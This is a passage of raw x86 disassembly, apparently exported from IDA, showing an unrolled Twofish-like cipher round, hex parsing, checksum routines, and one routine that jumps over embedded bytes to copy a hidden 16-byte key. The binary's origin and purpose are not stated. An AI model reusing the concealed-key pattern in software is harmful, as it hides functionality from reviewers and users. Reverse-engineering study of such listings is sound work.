mov eax, [ebp+var_18+1]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_F0]
xor edx, [ecx+eax*4+921h]
mov eax, [ebp+var_18+2]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_F0]
xor edx, [ecx+eax*4+925h]
mov [ebp+var_14], edx
mov edx, [ebp+var_20]
rol edx, 1
mov [ebp+var_20], edx
mov eax, [ebp+var_10]
add eax, [ebp+var_14]
add eax, [ebp+var_7C]
mov ecx, [ebp+var_24]
xor ecx, eax
mov [ebp+var_24], ecx
mov edx, [ebp+var_14]
mov eax, [ebp+var_10]
lea ecx, [eax+edx*2]
add ecx, [ebp+var_78]
mov edx, [ebp+var_20]
xor edx, ecx
mov [ebp+var_20], edx
mov eax, [ebp+var_24]
ror eax, 1
mov [ebp+var_24], eax
mov ecx, [ebp+var_24]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_24+1]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_F0]
mov esi, [ebp+var_F0]
mov ecx, [eax+ecx*4+121h]
xor ecx, [esi+edx*4+125h]
mov edx, [ebp+var_24+2]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_F0]
xor ecx, [eax+edx*4+921h]
mov edx, [ebp+var_24+3]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_F0]
xor ecx, [eax+edx*4+925h]
mov [ebp+var_10], ecx
mov ecx, [ebp+var_20+3]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_20]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_F0]
mov esi, [ebp+var_F0]
mov ecx, [eax+ecx*4+121h]
xor ecx, [esi+edx*4+125h]
mov edx, [ebp+var_20+1]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_F0]
xor ecx, [eax+edx*4+921h]
mov edx, [ebp+var_20+2]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_F0]
xor ecx, [eax+edx*4+925h]
mov [ebp+var_14], ecx
mov ecx, [ebp+var_18]
rol ecx, 1
mov [ebp+var_18], ecx
mov edx, [ebp+var_10]
add edx, [ebp+var_14]
add edx, [ebp+var_84]
mov eax, [ebp+var_1C]
xor eax, edx
mov [ebp+var_1C], eax
mov ecx, [ebp+var_14]
mov edx, [ebp+var_10]
lea eax, [edx+ecx*2]
add eax, [ebp+var_80]
mov ecx, [ebp+var_18]
xor ecx, eax
mov [ebp+var_18], ecx
mov edx, [ebp+var_1C]
ror edx, 1
mov [ebp+var_1C], edx
mov eax, [ebp+var_1C]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_1C+1]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_F0]
mov esi, [ebp+var_F0]
mov eax, [edx+eax*4+121h]
xor eax, [esi+ecx*4+125h]
mov ecx, [ebp+var_1C+2]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_F0]
xor eax, [edx+ecx*4+921h]
mov ecx, [ebp+var_1C+3]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_F0]
xor eax, [edx+ecx*4+925h]
mov [ebp+var_10], eax
mov eax, [ebp+var_18+3]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_18]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_F0]
mov esi, [ebp+var_F0]
mov eax, [edx+eax*4+121h]
xor eax, [esi+ecx*4+125h]
mov ecx, [ebp+var_18+1]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_F0]
xor eax, [edx+ecx*4+921h]
mov ecx, [ebp+var_18+2]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_F0]
xor eax, [edx+ecx*4+925h]
mov [ebp+var_14], eax
mov eax, [ebp+var_20]
rol eax, 1
mov [ebp+var_20], eax
mov ecx, [ebp+var_10]
add ecx, [ebp+var_14]
add ecx, [ebp+var_8C]
mov edx, [ebp+var_24]
xor edx, ecx
mov [ebp+var_24], edx
mov eax, [ebp+var_14]
mov ecx, [ebp+var_10]
lea edx, [ecx+eax*2]
add edx, [ebp+var_88]
mov eax, [ebp+var_20]
xor eax, edx
mov [ebp+var_20], eax
mov ecx, [ebp+var_24]
ror ecx, 1
mov [ebp+var_24], ecx
mov edx, [ebp+var_24]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_24+1]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_F0]
mov esi, [ebp+var_F0]
mov edx, [ecx+edx*4+121h]
xor edx, [esi+eax*4+125h]
mov eax, [ebp+var_24+2]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_F0]
xor edx, [ecx+eax*4+921h]
mov eax, [ebp+var_24+3]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_F0]
xor edx, [ecx+eax*4+925h]
mov [ebp+var_10], edx
mov edx, [ebp+var_20+3]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_20]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_F0]
mov esi, [ebp+var_F0]
mov edx, [ecx+edx*4+121h]
xor edx, [esi+eax*4+125h]
mov eax, [ebp+var_20+1]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_F0]
xor edx, [ecx+eax*4+921h]
mov eax, [ebp+var_20+2]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_F0]
xor edx, [ecx+eax*4+925h]
mov [ebp+var_14], edx
mov edx, [ebp+var_18]
rol edx, 1
mov [ebp+var_18], edx
mov eax, [ebp+var_10]
add eax, [ebp+var_14]
add eax, [ebp+var_94]
mov ecx, [ebp+var_1C]
xor ecx, eax
mov [ebp+var_1C], ecx
mov edx, [ebp+var_14]
mov eax, [ebp+var_10]
lea ecx, [eax+edx*2]
add ecx, [ebp+var_90]
mov edx, [ebp+var_18]
xor edx, ecx
mov [ebp+var_18], edx
mov eax, [ebp+var_1C]
ror eax, 1
mov [ebp+var_1C], eax
mov ecx, [ebp+var_1C]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_1C+1]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_F0]
mov esi, [ebp+var_F0]
mov ecx, [eax+ecx*4+121h]
xor ecx, [esi+edx*4+125h]
mov edx, [ebp+var_1C+2]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_F0]
xor ecx, [eax+edx*4+921h]
mov edx, [ebp+var_1C+3]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_F0]
xor ecx, [eax+edx*4+925h]
mov [ebp+var_10], ecx
mov ecx, [ebp+var_18+3]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_18]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_F0]
mov esi, [ebp+var_F0]
mov ecx, [eax+ecx*4+121h]
xor ecx, [esi+edx*4+125h]
mov edx, [ebp+var_18+1]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_F0]
xor ecx, [eax+edx*4+921h]
mov edx, [ebp+var_18+2]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_F0]
xor ecx, [eax+edx*4+925h]
mov [ebp+var_14], ecx
mov ecx, [ebp+var_20]
rol ecx, 1
mov [ebp+var_20], ecx
mov edx, [ebp+var_10]
add edx, [ebp+var_14]
add edx, [ebp+var_9C]
mov eax, [ebp+var_24]
xor eax, edx
mov [ebp+var_24], eax
mov ecx, [ebp+var_14]
mov edx, [ebp+var_10]
lea eax, [edx+ecx*2]
add eax, [ebp+var_98]
mov ecx, [ebp+var_20]
xor ecx, eax
mov [ebp+var_20], ecx
mov edx, [ebp+var_24]
ror edx, 1
mov [ebp+var_24], edx
mov eax, [ebp+var_24]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_24+1]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_F0]
mov esi, [ebp+var_F0]
mov eax, [edx+eax*4+121h]
xor eax, [esi+ecx*4+125h]
mov ecx, [ebp+var_24+2]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_F0]
xor eax, [edx+ecx*4+921h]
mov ecx, [ebp+var_24+3]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_F0]
xor eax, [edx+ecx*4+925h]
mov [ebp+var_10], eax
mov eax, [ebp+var_20+3]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_20]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_F0]
mov esi, [ebp+var_F0]
mov eax, [edx+eax*4+121h]
xor eax, [esi+ecx*4+125h]
mov ecx, [ebp+var_20+1]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_F0]
xor eax, [edx+ecx*4+921h]
mov ecx, [ebp+var_20+2]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_F0]
xor eax, [edx+ecx*4+925h]
mov [ebp+var_14], eax
mov eax, [ebp+var_18]
rol eax, 1
mov [ebp+var_18], eax
mov ecx, [ebp+var_10]
add ecx, [ebp+var_14]
add ecx, [ebp+var_A4]
mov edx, [ebp+var_1C]
xor edx, ecx
mov [ebp+var_1C], edx
mov eax, [ebp+var_14]
mov ecx, [ebp+var_10]
lea edx, [ecx+eax*2]
add edx, [ebp+var_A0]
mov eax, [ebp+var_18]
xor eax, edx
mov [ebp+var_18], eax
mov ecx, [ebp+var_1C]
ror ecx, 1
mov [ebp+var_1C], ecx
mov edx, [ebp+var_1C]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_1C+1]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_F0]
mov esi, [ebp+var_F0]
mov edx, [ecx+edx*4+121h]
xor edx, [esi+eax*4+125h]
mov eax, [ebp+var_1C+2]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_F0]
xor edx, [ecx+eax*4+921h]
mov eax, [ebp+var_1C+3]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_F0]
xor edx, [ecx+eax*4+925h]
mov [ebp+var_10], edx
mov edx, [ebp+var_18+3]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_18]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_F0]
mov esi, [ebp+var_F0]
mov edx, [ecx+edx*4+121h]
xor edx, [esi+eax*4+125h]
mov eax, [ebp+var_18+1]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_F0]
xor edx, [ecx+eax*4+921h]
mov eax, [ebp+var_18+2]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_F0]
xor edx, [ecx+eax*4+925h]
mov [ebp+var_14], edx
mov edx, [ebp+var_20]
rol edx, 1
mov [ebp+var_20], edx
mov eax, [ebp+var_10]
add eax, [ebp+var_14]
add eax, [ebp+var_AC]
mov ecx, [ebp+var_24]
xor ecx, eax
mov [ebp+var_24], ecx
mov edx, [ebp+var_14]
mov eax, [ebp+var_10]
lea ecx, [eax+edx*2]
add ecx, [ebp+var_A8]
mov edx, [ebp+var_20]
xor edx, ecx
mov [ebp+var_20], edx
mov eax, [ebp+var_24]
ror eax, 1
mov [ebp+var_24], eax
mov ecx, [ebp+var_24]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_24+1]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_F0]
mov esi, [ebp+var_F0]
mov ecx, [eax+ecx*4+121h]
xor ecx, [esi+edx*4+125h]
mov edx, [ebp+var_24+2]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_F0]
xor ecx, [eax+edx*4+921h]
mov edx, [ebp+var_24+3]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_F0]
xor ecx, [eax+edx*4+925h]
mov [ebp+var_10], ecx
mov ecx, [ebp+var_20+3]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_20]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_F0]
mov esi, [ebp+var_F0]
mov ecx, [eax+ecx*4+121h]
xor ecx, [esi+edx*4+125h]
mov edx, [ebp+var_20+1]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_F0]
xor ecx, [eax+edx*4+921h]
mov edx, [ebp+var_20+2]
and edx, 0FFh
shl edx, 1
mov eax, [ebp+var_F0]
xor ecx, [eax+edx*4+925h]
mov [ebp+var_14], ecx
mov ecx, [ebp+var_18]
rol ecx, 1
mov [ebp+var_18], ecx
mov edx, [ebp+var_10]
add edx, [ebp+var_14]
add edx, [ebp+var_B4]
mov eax, [ebp+var_1C]
xor eax, edx
mov [ebp+var_1C], eax
mov ecx, [ebp+var_14]
mov edx, [ebp+var_10]
lea eax, [edx+ecx*2]
add eax, [ebp+var_B0]
mov ecx, [ebp+var_18]
xor ecx, eax
mov [ebp+var_18], ecx
mov edx, [ebp+var_1C]
ror edx, 1
mov [ebp+var_1C], edx
mov eax, [ebp+var_1C]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_1C+1]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_F0]
mov esi, [ebp+var_F0]
mov eax, [edx+eax*4+121h]
xor eax, [esi+ecx*4+125h]
mov ecx, [ebp+var_1C+2]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_F0]
xor eax, [edx+ecx*4+921h]
mov ecx, [ebp+var_1C+3]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_F0]
xor eax, [edx+ecx*4+925h]
mov [ebp+var_10], eax
mov eax, [ebp+var_18+3]
and eax, 0FFh
shl eax, 1
mov ecx, [ebp+var_18]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_F0]
mov esi, [ebp+var_F0]
mov eax, [edx+eax*4+121h]
xor eax, [esi+ecx*4+125h]
mov ecx, [ebp+var_18+1]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_F0]
xor eax, [edx+ecx*4+921h]
mov ecx, [ebp+var_18+2]
and ecx, 0FFh
shl ecx, 1
mov edx, [ebp+var_F0]
xor eax, [edx+ecx*4+925h]
mov [ebp+var_14], eax
mov eax, [ebp+var_20]
rol eax, 1
mov [ebp+var_20], eax
mov ecx, [ebp+var_10]
add ecx, [ebp+var_14]
add ecx, [ebp+var_BC]
mov edx, [ebp+var_24]
xor edx, ecx
mov [ebp+var_24], edx
mov eax, [ebp+var_14]
mov ecx, [ebp+var_10]
lea edx, [ecx+eax*2]
add edx, [ebp+var_B8]
mov eax, [ebp+var_20]
xor eax, edx
mov [ebp+var_20], eax
mov ecx, [ebp+var_24]
ror ecx, 1
mov [ebp+var_24], ecx
mov edx, [ebp+var_1C]
xor edx, [ebp+var_CC]
mov eax, [ebp+arg_8]
mov [eax], edx
mov ecx, [ebp+var_18]
xor ecx, [ebp+var_C8]
mov edx, [ebp+arg_8]
mov [edx+4], ecx
mov eax, [ebp+var_24]
xor eax, [ebp+var_C4]
mov ecx, [ebp+arg_8]
mov [ecx+8], eax
mov edx, [ebp+var_20]
xor edx, [ebp+var_C0]
mov eax, [ebp+arg_8]
mov [eax+0Ch], edx
cmp [ebp+var_E4], 2
jnz short loc_40F0FC
mov ecx, [ebp+arg_8]
mov edx, [ecx]
mov [ebp+var_3C], edx
mov eax, [ebp+arg_8]
mov ecx, [eax+4]
mov [ebp+var_38], ecx
mov edx, [ebp+arg_8]
mov eax, [edx+8]
mov [ebp+var_34], eax
mov ecx, [ebp+arg_8]
mov edx, [ecx+0Ch]
mov [ebp+var_30], edx
loc_40F0FC: ; CODE XREF: sub_40DDFF+12D8�j
jmp loc_40E069
; ---------------------------------------------------------------------------
loc_40F101: ; CODE XREF: sub_40DDFF+296�j
cmp [ebp+var_E4], 2
jnz short loc_40F13A
mov eax, [ebp+var_EC]
mov ecx, [ebp+var_3C]
mov [eax+15h], ecx
mov edx, [ebp+var_EC]
mov eax, [ebp+var_38]
mov [edx+19h], eax
mov ecx, [ebp+var_EC]
mov edx, [ebp+var_34]
mov [ecx+1Dh], edx
mov eax, [ebp+var_EC]
mov ecx, [ebp+var_30]
mov [eax+21h], ecx
loc_40F13A: ; CODE XREF: sub_40DDFF+1309�j
mov eax, [ebp+arg_4]
loc_40F13D: ; CODE XREF: sub_40DDFF+1BE�j
pop edi
pop esi
mov esp, ebp
pop ebp
retn 0Ch
sub_40DDFF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F145 proc near ; CODE XREF: sub_40DDFF+1D9�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
mov [ebp+var_18], dl
mov [ebp+var_14], ecx
mov eax, [ebp+var_14]
add eax, 0A1h
mov [ebp+var_10], eax
mov ecx, [ebp+var_14]
mov edx, [ecx+4Dh]
shl edx, 1
mov eax, [ebp+var_10]
lea ecx, [eax+edx*4-8]
mov [ebp+var_4], ecx
jmp short loc_40F182
; ---------------------------------------------------------------------------
loc_40F170: ; CODE XREF: sub_40F145+7D�j
mov edx, [ebp+var_10]
add edx, 8
mov [ebp+var_10], edx
mov eax, [ebp+var_4]
sub eax, 8
mov [ebp+var_4], eax
loc_40F182: ; CODE XREF: sub_40F145+29�j
mov ecx, [ebp+var_10]
cmp ecx, [ebp+var_4]
jnb short loc_40F1C4
mov edx, [ebp+var_10]
mov eax, [edx]
mov [ebp+var_8], eax
mov ecx, [ebp+var_10]
mov edx, [ecx+4]
mov [ebp+var_C], edx
mov eax, [ebp+var_10]
mov ecx, [ebp+var_4]
mov edx, [ecx]
mov [eax], edx
mov eax, [ebp+var_10]
mov ecx, [ebp+var_4]
mov edx, [ecx+4]
mov [eax+4], edx
mov eax, [ebp+var_4]
mov ecx, [ebp+var_8]
mov [eax], ecx
mov edx, [ebp+var_4]
mov eax, [ebp+var_C]
mov [edx+4], eax
jmp short loc_40F170
; ---------------------------------------------------------------------------
loc_40F1C4: ; CODE XREF: sub_40F145+43�j
mov ecx, [ebp+var_14]
mov dl, [ebp+var_18]
mov [ecx], dl
mov esp, ebp
pop ebp
retn
sub_40F145 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F1D0 proc near ; CODE XREF: sub_40DD7C+31�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
mov [ebp+var_18], edx
mov [ebp+var_14], ecx
mov [ebp+var_C], 1
mov eax, [ebp+var_C]
and eax, 0FFh
cmp eax, 1
jz short loc_40F1FA
mov eax, 0FFFFFFF7h
jmp loc_40F325
; ---------------------------------------------------------------------------
loc_40F1FA: ; CODE XREF: sub_40F1D0+1E�j
mov [ebp+var_C], 0FFFFFFFFh
mov ecx, [ebp+var_C]
shr ecx, 11h
mov [ebp+var_C], ecx
cmp [ebp+var_C], 7FFFh
jz short loc_40F21D
mov eax, 0FFFFFFF5h
jmp loc_40F325
; ---------------------------------------------------------------------------
loc_40F21D: ; CODE XREF: sub_40F1D0+41�j
mov [ebp+var_10], 0
jmp short loc_40F22F
; ---------------------------------------------------------------------------
loc_40F226: ; CODE XREF: sub_40F1D0+77�j
mov edx, [ebp+var_10]
add edx, 1
mov [ebp+var_10], edx
loc_40F22F: ; CODE XREF: sub_40F1D0+54�j
mov eax, [ebp+var_10]
shl eax, 5
cmp eax, [ebp+var_14]
jge short loc_40F249
mov ecx, [ebp+var_10]
mov edx, [ebp+arg_0]
mov dword ptr [edx+ecx*4], 0
jmp short loc_40F226
; ---------------------------------------------------------------------------
loc_40F249: ; CODE XREF: sub_40F1D0+68�j
mov [ebp+var_10], 0
jmp short loc_40F25B
; ---------------------------------------------------------------------------
loc_40F252: ; CODE XREF: sub_40F1D0+14E�j
mov eax, [ebp+var_10]
add eax, 1
mov [ebp+var_10], eax
loc_40F25B: ; CODE XREF: sub_40F1D0+80�j
mov ecx, [ebp+var_10]
shl ecx, 2
cmp ecx, [ebp+var_14]
jge loc_40F323
mov edx, [ebp+var_18]
add edx, [ebp+var_10]
mov al, [edx]
mov [ebp+var_8], al
cmp [ebp+arg_4], 0
jz short loc_40F286
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_10]
mov dl, [ebp+var_8]
mov [ecx], dl
loc_40F286: ; CODE XREF: sub_40F1D0+A9�j
movsx eax, [ebp+var_8]
cmp eax, 30h
jl short loc_40F2A4
movsx ecx, [ebp+var_8]
cmp ecx, 39h
jg short loc_40F2A4
movsx edx, [ebp+var_8]
sub edx, 30h
mov [ebp+var_4], edx
jmp short loc_40F2E7
; ---------------------------------------------------------------------------
loc_40F2A4: ; CODE XREF: sub_40F1D0+BD�j
; sub_40F1D0+C6�j
movsx eax, [ebp+var_8]
cmp eax, 61h
jl short loc_40F2C2
movsx ecx, [ebp+var_8]
cmp ecx, 66h
jg short loc_40F2C2
movsx edx, [ebp+var_8]
sub edx, 57h
mov [ebp+var_4], edx
jmp short loc_40F2E7
; ---------------------------------------------------------------------------
loc_40F2C2: ; CODE XREF: sub_40F1D0+DB�j
; sub_40F1D0+E4�j
movsx eax, [ebp+var_8]
cmp eax, 41h
jl short loc_40F2E0
movsx ecx, [ebp+var_8]
cmp ecx, 46h
jg short loc_40F2E0
movsx edx, [ebp+var_8]
sub edx, 37h
mov [ebp+var_4], edx
jmp short loc_40F2E7
; ---------------------------------------------------------------------------
loc_40F2E0: ; CODE XREF: sub_40F1D0+F9�j
; sub_40F1D0+102�j
mov eax, 0FFFFFFFEh
jmp short loc_40F325
; ---------------------------------------------------------------------------
loc_40F2E7: ; CODE XREF: sub_40F1D0+D2�j
; sub_40F1D0+F0�j ...
mov eax, [ebp+var_10]
cdq
and edx, 7
add eax, edx
sar eax, 3
mov ecx, [ebp+var_10]
xor ecx, 1
and ecx, 7
shl ecx, 2
mov edx, [ebp+var_4]
shl edx, cl
mov ecx, [ebp+arg_0]
mov ecx, [ecx+eax*4]
or ecx, edx
mov eax, [ebp+var_10]
cdq
and edx, 7
add eax, edx
sar eax, 3
mov edx, [ebp+arg_0]
mov [edx+eax*4], ecx
jmp loc_40F252
; ---------------------------------------------------------------------------
loc_40F323: ; CODE XREF: sub_40F1D0+94�j
xor eax, eax
loc_40F325: ; CODE XREF: sub_40F1D0+25�j
; sub_40F1D0+48�j ...
mov esp, ebp
pop ebp
retn 8
sub_40F1D0 endp
; ---------------------------------------------------------------------------
db 0CCh
dd 0CCCCCCCCh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F330 proc near ; CODE XREF: rdata:0040A5FC�p
; sub_40AD10+C6�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ebx, [ebp+arg_4]
inc ebx
mov edi, [ebp+arg_C]
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_8]
add edi, 9
mov [edi], al
inc edi
mov ecx, [ebp+arg_4]
rep movsb
mov edi, [ebp+arg_C]
mov byte ptr [edi], 1
push ebx
call sub_40A30E
mov [edi+1], eax
mov edx, ebx
mov ecx, [ebp+arg_C]
add ecx, 9
call sub_40F490
push eax
call sub_40A30E
mov [edi+5], eax
add ebx, 9
mov ecx, ebx
xor eax, eax
pop ebx
pop esi
pop edi
leave
retn 10h
sub_40F330 endp
; ---------------------------------------------------------------------------
db 3 dup(0CCh)
dd 3 dup(0CCCCCCCCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F390 proc near ; CODE XREF: rdata:0040A637�p
; sub_40AD10+FA�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov edi, [ebp+arg_0]
cmp byte ptr [edi], 1
jnz short loc_40F3E4
mov edi, [ebp+arg_0]
mov ebx, [edi+5]
mov eax, [edi+1]
push eax
call sub_40A30E
mov edx, eax
mov ecx, [ebp+arg_4]
sub ecx, 9
cmp eax, ecx
jnz short loc_40F3DD
push eax
add edi, 9
movzx esi, byte ptr [edi]
mov ecx, edi
call sub_40F490
push eax
call sub_40A30E
pop ecx
cmp eax, ebx
jnz short loc_40F3D6
xor eax, eax
jmp short loc_40F3E9
; ---------------------------------------------------------------------------
loc_40F3D6: ; CODE XREF: sub_40F390+40�j
mov eax, 0FFFFFFFFh
jmp short loc_40F3E9
; ---------------------------------------------------------------------------
loc_40F3DD: ; CODE XREF: sub_40F390+27�j
mov eax, 0FFFFFFFFh
jmp short loc_40F3E9
; ---------------------------------------------------------------------------
loc_40F3E4: ; CODE XREF: sub_40F390+C�j
mov eax, 0FFFFFFFFh
loc_40F3E9: ; CODE XREF: sub_40F390+44�j
; sub_40F390+4B�j ...
mov edx, esi
pop ebx
pop esi
pop edi
leave
retn 8
sub_40F390 endp
; ---------------------------------------------------------------------------
dw 0CCCCh
dd 3 dup(0CCCCCCCCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F400 proc near ; CODE XREF: sub_40AD10+130�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push edi
push esi
push ebx
mov [ebp+var_4], 0
mov edi, [ebp+arg_0]
mov esi, [ebp+arg_0]
add esi, 10h
jmp short loc_40F424
; ---------------------------------------------------------------------------
loc_40F41B: ; CODE XREF: sub_40F400+43�j
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
loc_40F424: ; CODE XREF: sub_40F400+19�j
cmp [ebp+var_4], 10h
jnb short loc_40F445
mov edx, [ebp+var_4]
mov eax, [ebp+var_4]
mov cl, [edx+edi]
add cl, [eax+esi]
mov edx, [ebp+var_4]
mov [edx+edi], cl
mov eax, [ebp+var_4]
mov byte ptr [eax+esi], 0
jmp short loc_40F41B
; ---------------------------------------------------------------------------
loc_40F445: ; CODE XREF: sub_40F400+28�j
pop ebx
pop esi
pop edi
leave
retn 4
sub_40F400 endp
; ---------------------------------------------------------------------------
dd 0CCCCCCCCh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F450 proc near ; CODE XREF: sub_40AD10+4F�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push edi
push esi
push ebx
jmp short loc_40F46A
; ---------------------------------------------------------------------------
dd 0BB971290h, 0F70E54BCh, 0BEFCC1CFh, 0FDA17E52h
db 20h, 90h
; ---------------------------------------------------------------------------
loc_40F46A: ; CODE XREF: sub_40F450+6�j
mov eax, [ebp+arg_0]
lea edi, [eax+51h]
mov ecx, 10h
lea esi, loc_40D051+8
rep movsb
mov ecx, [ebp+arg_0]
call sub_40C140
pop ebx
pop esi
pop edi
leave
retn 4
sub_40F450 endp
; ---------------------------------------------------------------------------
dd 0CCCCCCCCh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F490 proc near ; CODE XREF: sub_40F330+35�p
; sub_40F390+32�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14h
mov [ebp+var_14], edx
mov [ebp+var_10], ecx
mov eax, [ebp+var_10]
mov [ebp+var_C], eax
mov [ebp+var_8], 0
loc_40F4A9: ; CODE XREF: sub_40F490+3C�j
mov ecx, [ebp+var_14]
mov edx, [ebp+var_10]
lea eax, [edx+ecx-4]
cmp [ebp+var_C], eax
ja short loc_40F4CE
mov ecx, [ebp+var_C]
mov edx, [ebp+var_8]
add edx, [ecx]
mov [ebp+var_8], edx
mov eax, [ebp+var_C]
add eax, 4
mov [ebp+var_C], eax
jmp short loc_40F4A9
; ---------------------------------------------------------------------------
loc_40F4CE: ; CODE XREF: sub_40F490+26�j
mov ecx, [ebp+var_C]
mov [ebp+var_4], ecx
mov edx, [ebp+var_10]
add edx, [ebp+var_14]
cmp [ebp+var_4], edx
jnb short loc_40F4F7
mov eax, [ebp+var_4]
xor ecx, ecx
mov cl, [eax]
mov edx, [ebp+var_8]
add edx, ecx
mov [ebp+var_8], edx
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_40F4F7: ; CODE XREF: sub_40F490+4D�j
mov ecx, [ebp+var_10]
add ecx, [ebp+var_14]
cmp [ebp+var_4], ecx
jnb short loc_40F51D
mov edx, [ebp+var_4]
xor eax, eax
mov al, [edx]
shl eax, 8
mov ecx, [ebp+var_8]
add ecx, eax
mov [ebp+var_8], ecx
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_40F51D: ; CODE XREF: sub_40F490+70�j
mov eax, [ebp+var_10]
add eax, [ebp+var_14]
cmp [ebp+var_4], eax
jnb short loc_40F543
mov ecx, [ebp+var_4]
xor edx, edx
mov dl, [ecx]
shl edx, 10h
mov eax, [ebp+var_8]
add eax, edx
mov [ebp+var_8], eax
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
loc_40F543: ; CODE XREF: sub_40F490+96�j
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_40F490 endp
; ---------------------------------------------------------------------------
dw 0CCCCh
dd 0CCCCCCCCh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F550 proc near ; CODE XREF: sub_409C10+18�p
; rdata:0040F789�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push edi
push esi
push ebx
mov ebx, [ebp+arg_0]
inc dword_41BED0
push dword ptr [ebx+18h]
call sub_40A290
mov esi, eax
push 90h
push ebx
push esi
call sub_40F5BF
mov ebx, esi
add esi, 90h
mov [ebp+var_4], esi
mov eax, 0Ch
mov ecx, [ebx+4]
